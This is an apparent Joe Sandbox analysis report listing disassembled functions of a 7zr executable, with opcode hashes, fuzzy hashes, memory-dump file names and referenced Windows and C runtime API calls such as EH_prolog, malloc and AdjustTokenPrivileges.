                                              • API String ID: 3519838083-0
                                              • Opcode ID: 541fbcb6860b19efa57e74254269f336df511825a71fdf53d50ee5daa908483e
                                              • Instruction ID: 942f39442f50023d4f5eb2576bc200cb57c6d6a66a209e87dbe64200691dd411
                                              • Opcode Fuzzy Hash: 541fbcb6860b19efa57e74254269f336df511825a71fdf53d50ee5daa908483e
                                              • Instruction Fuzzy Hash: DEF1CC70904785DFCF21CF64C494BAABBE1BF54304F5848AEE48E8B691D731E954CB62
                                              Function 00D410D3 Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: b6c2e6bab84e5b0435651dec2399a68f567b7597744d05fc4334bf9bce90e9c2
                                              • Instruction ID: 9e2e48e87f95e876c6a97332c9ec67d457e9f9c5d99106e83114a320e183dc53
                                              • Opcode Fuzzy Hash: b6c2e6bab84e5b0435651dec2399a68f567b7597744d05fc4334bf9bce90e9c2
                                              • Instruction Fuzzy Hash: C4D18D74A00745AFDF24CFA8C884BEEBBF1BF08300F14852DE559A7691D775A884CBA0
                                              Function 00D3CF91 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D3CF96
                                                • Part of subcall function 00D41511: __EH_prolog.LIBCMT ref: 00D41516
                                                • Part of subcall function 00D41511: _CxxThrowException.MSVCRT(?,00DAD480), ref: 00D41561
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ExceptionThrow
                                              • String ID:
                                              • API String ID: 2366012087-0
                                              • Opcode ID: 55aaeb33be7fbdb805cae095908c8be551c0644ab9743df17c191d000b226fbb
                                              • Instruction ID: de40b26ff0462ec9373db6484b653d1571ac44e38c6b2d3aa72ca364f4df829c
                                              • Opcode Fuzzy Hash: 55aaeb33be7fbdb805cae095908c8be551c0644ab9743df17c191d000b226fbb
                                              • Instruction Fuzzy Hash: DB516B71900289DFCB11CFA8D888BAEBBB5AF49304F1844AEE45A97242C7719E45CF31
                                              Function 00D2F784 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 530eb0840858caa9ee5c610439ee9ed20c812f615fe6edc94d19ea37b6661b51
                                              • Instruction ID: dfacc7fce39ee76bcf10ca929f89e003425765d0c18e8e1cce7c2433b986de7f
                                              • Opcode Fuzzy Hash: 530eb0840858caa9ee5c610439ee9ed20c812f615fe6edc94d19ea37b6661b51
                                              • Instruction Fuzzy Hash: 25515BB4A00616DFCB14CF64D4909AAFBB2FF49308B14496DE592AB750D331E905CFA0
                                              Function 00D3AD3A Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: ebc457e714f689cdc450f84c079fa0a6aaad88706e4e0caafcd3be604ca21cbb
                                              • Instruction ID: 069d7460e9b3eb1a5e3f8d8f8ba6f6c0a50920d4b947a8fcfd45848f7b818174
                                              • Opcode Fuzzy Hash: ebc457e714f689cdc450f84c079fa0a6aaad88706e4e0caafcd3be604ca21cbb
                                              • Instruction Fuzzy Hash: C0418E70B00656EFDB24CF68C484B6ABBA0BF45310F188A6DE4D697691D370ED81CB61
                                              Function 00D04250 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D04255
                                                • Part of subcall function 00D0440B: __EH_prolog.LIBCMT ref: 00D04410
                                                • Part of subcall function 00CF1E0C: malloc.MSVCRT ref: 00CF1E1F
                                                • Part of subcall function 00CF1E0C: _CxxThrowException.MSVCRT(?,00DA4B28), ref: 00CF1E39
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ExceptionThrowmalloc
                                              • String ID:
                                              • API String ID: 3744649731-0
                                              • Opcode ID: b13740aa9fca767e763da74088cd67173b8a36a05546cc04d66c20936e832023
                                              • Instruction ID: 96c73e2fef445e4fd51cc8cc57be9b52d1e6ddd877fc10162acbdefc6eafa800
                                              • Opcode Fuzzy Hash: b13740aa9fca767e763da74088cd67173b8a36a05546cc04d66c20936e832023
                                              • Instruction Fuzzy Hash: 6951D5B0801748CFC725DF69C184A9AFBF0BF19304F5589AEC59E97752D7B0A608CB61
                                              Function 00D1D0E1 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D1D0E6
                                                • Part of subcall function 00CF1E0C: malloc.MSVCRT ref: 00CF1E1F
                                                • Part of subcall function 00CF1E0C: _CxxThrowException.MSVCRT(?,00DA4B28), ref: 00CF1E39
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ExceptionH_prologThrowmalloc
                                              • String ID:
                                              • API String ID: 3978722251-0
                                              • Opcode ID: a290d9ee7dd7f8e0c7b8fb00983a656cd08935746f1cb60be6ae27cabc7b635a
                                              • Instruction ID: 4fb14890421dc3f6ba13a0b17e9468701b476705cad0ead03d08e5e2030fef87
                                              • Opcode Fuzzy Hash: a290d9ee7dd7f8e0c7b8fb00983a656cd08935746f1cb60be6ae27cabc7b635a
                                              • Instruction Fuzzy Hash: 6A418271A00359BFCB10DFA8D9446AEBBB5BF45310F284559E845E7281CB70DD85C7A1
                                              Function 00D07FC5 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D07FCA
                                                • Part of subcall function 00CF950D: SysAllocStringLen.OLEAUT32(?,?), ref: 00CF952C
                                                • Part of subcall function 00CF950D: _CxxThrowException.MSVCRT(?,00DA55B8), ref: 00CF954A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: AllocExceptionH_prologStringThrow
                                              • String ID:
                                              • API String ID: 1940201546-0
                                              • Opcode ID: 5004339ea4c75e2543faba0dfb3199ee22816465f5633d9a6b5bf229a599ae8f
                                              • Instruction ID: 90662842921fae102a955e314432cb7e08194ba6fc1ac10615dfb889e19d936e
                                              • Opcode Fuzzy Hash: 5004339ea4c75e2543faba0dfb3199ee22816465f5633d9a6b5bf229a599ae8f
                                              • Instruction Fuzzy Hash: B531A0728201098ACF14AFA4C851BFE7770FF24300F444029E18AB75A1DE31DA08EB72
                                              Function 00D2ADB7 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D2ADBC
                                                • Part of subcall function 00D2AD29: __EH_prolog.LIBCMT ref: 00D2AD2E
                                                • Part of subcall function 00D2AF2D: __EH_prolog.LIBCMT ref: 00D2AF32
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 6cfc0c7be95bfa95a85a35e9b8ad70dea5bfd7a91a7ac48c20ff759417d2bbbe
                                              • Instruction ID: 895774fde32ba822d989fd83f10532f9cd43ed233d7b740c13e4fb95c8764adf
                                              • Opcode Fuzzy Hash: 6cfc0c7be95bfa95a85a35e9b8ad70dea5bfd7a91a7ac48c20ff759417d2bbbe
                                              • Instruction Fuzzy Hash: C041E77144ABC4CEC326DF6881656CAFFE0AF35204F98899ED4EA43652D670A60CC776
                                              Function 00D1062E Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 6bf9f342d13818c02a172c231564c61773772e49c61ab0a08da25f78baa88f72
                                              • Instruction ID: 7a66a062209c7da9aa38bd623c84186699c36d932d415d56023a5ca1937e3a57
                                              • Opcode Fuzzy Hash: 6bf9f342d13818c02a172c231564c61773772e49c61ab0a08da25f78baa88f72
                                              • Instruction Fuzzy Hash: 5031F8B1900209EFCB14EF95E8918EEBFB5FF94364B20811AE42667251CB709981CBB0
                                              Function 00D198F2 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D198F7
                                                • Part of subcall function 00D19987: __EH_prolog.LIBCMT ref: 00D1998C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 4b1b82e6ed8e6b761862cc22bb4fe2879e04831ad01dff74e31da4624f8e60fd
                                              • Instruction ID: 5dda9e63cae8cf8aa24f10de167699075b9a87561927965b5db771cfa2454966
                                              • Opcode Fuzzy Hash: 4b1b82e6ed8e6b761862cc22bb4fe2879e04831ad01dff74e31da4624f8e60fd
                                              • Instruction Fuzzy Hash: 18113A35700205AFDB14CF59D8A4AAAB3A9FF89750F18855CF856DB291CB31E841CF70
                                              Function 00D1021A Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D1021F
                                                • Part of subcall function 00D03D66: __EH_prolog.LIBCMT ref: 00D03D6B
                                                • Part of subcall function 00D03D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03D7D
                                                • Part of subcall function 00D03D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03D94
                                                • Part of subcall function 00D03D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00D03DB6
                                                • Part of subcall function 00D03D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03DCB
                                                • Part of subcall function 00D03D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03DD5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                              • String ID:
                                              • API String ID: 1532160333-0
                                              • Opcode ID: b008b8d1750a0012188890b9549266361fa63c45d013320e0ad07066319450f7
                                              • Instruction ID: 5daddd746d1f712b344d0b25e085932da109b513771476df910fd2089ae4b573
                                              • Opcode Fuzzy Hash: b008b8d1750a0012188890b9549266361fa63c45d013320e0ad07066319450f7
                                              • Instruction Fuzzy Hash: 71214AB1946B90CFC321CF6A82D0686FFF4BB19600B94996EC0DA83B12C770B548CF65
                                              Function 00D11C6F Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D11C74
                                                • Part of subcall function 00CF6C72: __EH_prolog.LIBCMT ref: 00CF6C77
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 07da24969d9a1bebac50a2f15cd1dc3ab94ec0d1f3f2462f4a1b3f5ac0efb4be
                                              • Instruction ID: 048285cbfb4712e09ae8970f5abf43d28b8dab4041cae9a0e77c38bcb6344591
                                              • Opcode Fuzzy Hash: 07da24969d9a1bebac50a2f15cd1dc3ab94ec0d1f3f2462f4a1b3f5ac0efb4be
                                              • Instruction Fuzzy Hash: 1111AD35900208ABCF19FBE4E952BFEBB76AF04354F040029EA4263292DF715D89D6A1
                                              Function 00D07E5A Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D07E5F
                                                • Part of subcall function 00CF6C72: __EH_prolog.LIBCMT ref: 00CF6C77
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                                • Part of subcall function 00CF757D: GetLastError.KERNEL32(00CFD14C), ref: 00CF757D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ErrorLastfree
                                              • String ID:
                                              • API String ID: 683690243-0
                                              • Opcode ID: 92f9035cc0fc536353fb630b69db06036f5c4748d2d0daa1bfe54730782d4f6d
                                              • Instruction ID: 8be696b844d7f8b67946bd24ed8cc53fff89c63cb35fa9bece657e20419b113f
                                              • Opcode Fuzzy Hash: 92f9035cc0fc536353fb630b69db06036f5c4748d2d0daa1bfe54730782d4f6d
                                              • Instruction Fuzzy Hash: D9010432A457049FC721EF74D492AEEBBB1EF45310B00462EE98353692CB34A909DB61
                                              Function 00D3BF8C Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D3BF91
                                                • Part of subcall function 00D3D144: __EH_prolog.LIBCMT ref: 00D3D149
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$free
                                              • String ID:
                                              • API String ID: 2654054672-0
                                              • Opcode ID: e1312684d9da2aba6ee1288cc249312caf499f498c7e07e7aec56c04e7a3b7bc
                                              • Instruction ID: be722ef1005a211283e230bb2e6405c47e4b1030f21bdcaaae492e608ba62473
                                              • Opcode Fuzzy Hash: e1312684d9da2aba6ee1288cc249312caf499f498c7e07e7aec56c04e7a3b7bc
                                              • Instruction Fuzzy Hash: C7117075510754DFCB24EF64D905BDABBF4FF01344F00492CE4A6A3691DBB1AA04DBA0
                                              Function 00D3BDB5 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D3BDBA
                                                • Part of subcall function 00D3BE69: __EH_prolog.LIBCMT ref: 00D3BE6E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 8fcf55069d1fa320adc469291e2340c42ee446ad09f1736e49a4db4d554134bc
                                              • Instruction ID: 3cba7f19308edd6b932c41c753998ab6163cd2fc767cb16f52afbd973f660e9a
                                              • Opcode Fuzzy Hash: 8fcf55069d1fa320adc469291e2340c42ee446ad09f1736e49a4db4d554134bc
                                              • Instruction Fuzzy Hash: 0611E3B5901B84CFC720DF69C588686FBE4FF19304F54C9AED0AA97712D7B0A948CB61
                                              Function 00CF7AB2 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,00CF1AD1,00000000,00000002,00000002,?,00CF7B3E,?,00000000), ref: 00CF7AFD
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: FileTime
                                              • String ID:
                                              • API String ID: 1425588814-0
                                              • Opcode ID: e3d423b5f6997cf71431441b6b1584de45224ca5d61cfae489f03b38662b3b94
                                              • Instruction ID: 314aec0afe15be9d3e2536dd896a69a9dfe6b40e00845bb46de543768d467a84
                                              • Opcode Fuzzy Hash: e3d423b5f6997cf71431441b6b1584de45224ca5d61cfae489f03b38662b3b94
                                              • Instruction Fuzzy Hash: B201A230104248BFDF268F54CC09BFE3FA59B05320F14824DBAA5962E1C6B09F50E765
                                              Function 00D2ACF8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D2C0B8
                                                • Part of subcall function 00D17193: __EH_prolog.LIBCMT ref: 00D17198
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$free
                                              • String ID:
                                              • API String ID: 2654054672-0
                                              • Opcode ID: 04ba0d7271253c4a0fa380dd347019618b8a226edd5184ad0499e0262e74ab98
                                              • Instruction ID: 36c0c15e64467db4888c2b70fdd33c0a5f30b08f6dc726715009a23a841e9e2c
                                              • Opcode Fuzzy Hash: 04ba0d7271253c4a0fa380dd347019618b8a226edd5184ad0499e0262e74ab98
                                              • Instruction Fuzzy Hash: 09F0E972A10325DBD7259F49E9417AEF3A9EF64764F14102FE51197711CFB2DC4086B0
                                              Function 00D3035F Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D30364
                                                • Part of subcall function 00D301C4: __EH_prolog.LIBCMT ref: 00D301C9
                                                • Part of subcall function 00D30143: __EH_prolog.LIBCMT ref: 00D30148
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                                • Part of subcall function 00D303D8: __EH_prolog.LIBCMT ref: 00D303DD
                                                • Part of subcall function 00D3004A: __EH_prolog.LIBCMT ref: 00D3004F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$free
                                              • String ID:
                                              • API String ID: 2654054672-0
